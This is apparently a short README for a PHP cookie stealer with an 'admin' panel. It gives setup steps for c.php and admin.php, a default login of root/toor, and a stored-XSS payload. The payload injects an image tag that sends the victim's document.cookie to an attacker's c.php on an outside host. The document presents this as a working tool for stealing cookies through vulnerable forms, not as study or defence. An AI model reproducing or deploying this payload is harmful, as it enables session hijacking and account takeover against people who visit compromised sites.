Crappy cookie stealer with 'admin' panel made long time ago..
admin.php to view your cookies, c.php to grab the cookies.
c.php will write the cookies into admin.php, be sure to have write access on your server.
- Drop
admin.phpandc.phpin the same directory. - Go to your vulnerable formulary and send him a payload to your
c.php?c=something like this:
<script>document.write("<img src='http://xxxxx.fr/c.php?c="+document.cookie+"'></img>");</script>
- Navigate to admin.php, login with username: root password: toor
- ???
- Profit.